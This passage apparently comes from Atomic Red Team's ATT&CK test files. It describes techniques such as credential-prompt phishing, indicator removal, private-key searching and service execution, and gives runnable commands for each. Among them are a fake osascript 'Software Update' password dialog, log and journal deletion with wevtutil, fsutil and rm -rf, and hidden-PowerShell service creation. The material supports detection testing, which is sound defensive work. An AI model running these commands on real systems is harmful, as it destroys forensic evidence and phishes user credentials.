6 | (Citation: OSX Keydnap malware)
7 |
8 | Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite. (Citation: OSX Malware Exploits MacKeeper)
9 |
10 | Detection: This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to detect. Monitor process execution for unusual programs as well as AppleScript that could be used to prompt users for credentials.
11 |
12 | Platforms: macOS
13 |
14 | Data Sources: User interface, Process Monitoring
15 |
16 | Permissions Required: User
17 |
18 | ## Atomic Tests
19 |
20 | - [Atomic Test #1 - Prompt User for Password](#atomic-test-1---prompt-user-for-password)
21 |
22 |
23 |
24 |
25 | ## Atomic Test #1 - Prompt User for Password
26 | Prompt User for Password (Local Phishing)
27 | Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
28 |
29 | **Supported Platforms:** macOS
30 |
31 |
32 | #### Run it with `sh`!
33 | ```
34 | osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
35 | ```
36 |
37 |
--------------------------------------------------------------------------------
/tests/T1070/T1070.md:
--------------------------------------------------------------------------------
1 | # T1070 - Indicator Removal on Host
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070)
3 | Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.
4 |
5 | Detection: File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system will require different detection mechanisms.
6 |
7 | Platforms: Linux, macOS, Windows
8 |
9 | Data Sources: File monitoring, Process command-line parameters, Process monitoring
10 |
11 | Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems
12 |
13 | ## Atomic Tests
14 |
15 | - [Atomic Test #1 - Clear Logs](#atomic-test-1---clear-logs)
16 |
17 | - [Atomic Test #2 - FSUtil](#atomic-test-2---fsutil)
18 |
19 | - [Atomic Test #3 - rm -rf](#atomic-test-3---rm--rf)
20 |
21 |
22 |
23 |
24 | ## Atomic Test #1 - Clear Logs
25 | Clear Windows Event Logs
26 |
27 | **Supported Platforms:** Windows
28 |
29 |
30 | #### Inputs
31 | | Name | Description | Type | Default Value |
32 | |------|-------------|------|---------------|
33 | | log_name | Windows Log Name, ex System | String | System|
34 |
35 | #### Run it with `command_prompt`!
36 | ```
37 | wevtutil cl #{log_name}
38 | ```
39 |
40 |
41 |
42 | ## Atomic Test #2 - FSUtil
43 | Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
44 |
45 | **Supported Platforms:** Windows
46 |
47 |
48 | #### Run it with `command_prompt`!
49 | ```
50 | fsutil usn deletejournal /D C:
51 | ```
52 |
53 |
54 |
55 | ## Atomic Test #3 - rm -rf
56 | Delete system and audit logs
57 |
58 | **Supported Platforms:** macOS, Linux
59 |
60 |
61 | #### Run it with `sh`!
62 | ```
63 | rm -rf /private/var/log/system.log*
64 | rm -rf /private/var/audit/*
65 | ```
66 |
67 |
--------------------------------------------------------------------------------
/tests/T1064/T1064.md:
--------------------------------------------------------------------------------
1 | # T1064 - Scripting
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1064)
3 | Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
4 |
5 | Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macos being allowed or that the user will accept to activate them.
6 |
7 | Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)
8 |
9 | ## Atomic Tests
10 |
11 | - [Atomic Test #1 - Create and Execute Bash Shell Script](#atomic-test-1---create-and-execute-bash-shell-script)
12 |
13 |
14 |
15 |
16 | ## Atomic Test #1 - Create and Execute Bash Shell Script
17 | Creates and executes a simple bash script.
18 |
19 | **Supported Platforms:** macOS, Linux
20 |
21 |
22 | #### Run it with `sh`!
23 | ```
24 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
25 | sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
26 | chmod +x /tmp/art.sh
27 | sh /tmp/art.sh
28 | ```
29 |
--------------------------------------------------------------------------------
/tests/T1151/T1151.md:
--------------------------------------------------------------------------------
1 | # T1151 - Space after Filename
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1151)
3 | Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
4 |
5 | Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.
6 |
7 | Detection: It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.
8 |
9 | Platforms: Linux, macOS
10 |
11 | Data Sources: File monitoring, Process Monitoring
12 |
13 | Permissions Required: User
14 |
15 | Contributors: Erye Hernandez, Palo Alto Networks
16 |
17 | ## Atomic Tests
18 |
19 | - [Atomic Test #1 - Space After Filename](#atomic-test-1---space-after-filename)
20 |
21 |
22 |
23 |
24 | ## Atomic Test #1 - Space After Filename
25 | Space After Filename
26 |
27 | **Supported Platforms:** macOS
28 |
29 |
30 | #### Run it with these steps!
31 | 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
32 |
33 | 2. mv execute.txt "execute.txt "
34 |
35 | 3. ./execute.txt\
36 |
37 |
38 |
39 |
--------------------------------------------------------------------------------
/tests/T1145/T1145.md:
--------------------------------------------------------------------------------
1 | # T1145 - Private Keys
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1145)
3 | Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)
4 |
5 | Adversaries may gather private keys from compromised systems for use in authenticating to Remote Services like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on *nix-based systems or C:\Users\(username)\.ssh\ on Windows.
6 |
7 | Private keys should require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line.
8 |
9 | Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)
10 |
11 | Detection: Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.
12 |
13 | Platforms: Linux, Windows, macOS
14 |
15 | Data Sources: File monitoring
16 |
17 | Permissions Required: User
18 |
19 | Contributors: Itzik Kotler, SafeBreach
20 |
21 | ## Atomic Tests
22 |
23 | - [Atomic Test #1 - Private Keys](#atomic-test-1---private-keys)
24 |
25 |
26 |
27 |
28 | ## Atomic Test #1 - Private Keys
29 | Find private keys on the Windows file system.
30 |
31 | File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc
32 |
33 | **Supported Platforms:** Windows
34 |
35 |
36 | #### Run it with `command_prompt`!
37 | ```
38 | echo "ATOMICREDTEAM" > %windir%\cert.key
39 | dir c:\ /b /s .key | findstr /e .key
40 | ```
41 |
42 |
--------------------------------------------------------------------------------
/tests/T1062/T1062.md:
--------------------------------------------------------------------------------
1 | # T1062 - Hypervisor
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1062)
3 | A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.
4 |
5 | Detection: Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)
6 |
7 | Platforms: Windows
8 |
9 | Data Sources: System calls
10 |
11 | Permissions Required: Administrator, SYSTEM
12 |
13 | ## Atomic Tests
14 |
15 | - [Atomic Test #1 - Installing Hyper-V Feature](#atomic-test-1---installing-hyper-v-feature)
16 |
17 |
18 |
19 |
20 | ## Atomic Test #1 - Installing Hyper-V Feature
21 | PowerShell command to check if Hyper-v is installed .
22 | Install Hyper-V feature.
23 | Create a New-VM
24 |
25 | **Supported Platforms:** Windows
26 |
27 |
28 | #### Inputs
29 | | Name | Description | Type | Default Value |
30 | |------|-------------|------|---------------|
31 | | hostname | Host to query to see if Hyper-V feature is installed. | string | test-vm|
32 | | vm_name | Create a new VM. | string | testvm|
33 | | file_location | Location of new VHDX file | string | C:\Temp\test.vhdx|
34 |
35 | #### Run it with `powershell`!
36 | ```
37 | Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
38 | Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
39 | New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480
40 | ```
41 |
42 |
--------------------------------------------------------------------------------
/tests/T1035/T1035.md:
--------------------------------------------------------------------------------
1 | # T1035 - Service Execution
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1035)
3 | Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
4 |
5 | Detection: Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool PsExec.
6 |
7 | Platforms: Windows
8 |
9 | Data Sources: Windows Registry, Process command-line parameters, Process monitoring
10 |
11 | Permissions Required: Administrator, SYSTEM
12 |
13 | Remote Support: Yes
14 |
15 | ## Atomic Tests
16 |
17 | - [Atomic Test #1 - Execute a Command as a Service](#atomic-test-1---execute-a-command-as-a-service)
18 |
19 |
20 |
21 |
22 | ## Atomic Test #1 - Execute a Command as a Service
23 | Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
24 |
25 | **Supported Platforms:** Windows
26 |
27 |
28 | #### Inputs
29 | | Name | Description | Type | Default Value |
30 | |------|-------------|------|---------------|
31 | | service_name | Name of service to create | string | ARTService|
32 | | executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:�rt-marker.txt|
33 |
34 | #### Run it with `command_prompt`!
35 | ```
36 | sc.exe create #{service_name} binPath= #{executable_command}
37 | sc.exe start #{service_name}
38 | sc.exe delete #{service_name}
39 | ```
40 |
41 |
--------------------------------------------------------------------------------